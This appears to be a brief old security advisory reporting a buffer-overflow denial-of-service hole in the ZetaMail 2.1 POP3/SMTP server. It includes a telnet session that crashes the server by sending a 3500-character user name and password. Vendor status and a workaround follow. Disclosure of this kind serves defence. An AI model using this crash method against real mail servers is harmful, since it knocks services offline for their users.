PROBLEM
UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail
POP3/SMTP Server.
The buffer overflow is caused by a long user name/password,
3500 characters.
There is not much to expand on.... just a simple hole
Example:
[gimmemore@itsme]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK ZetaMail for 95 BD0211 4294764405.063903189415041@itsme>
USER {buffer)
+OK Send password
PASS {buffer)
Overflow Crashh.
Where (buffer) is 3500 characters.
Vendor Status:
Contacted.
Credit: USSRLABS
SOLUTION
Install another program from the same vendor,
MsgCore/95 2.11, MsgCore/NT 2.10
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a
r c h
|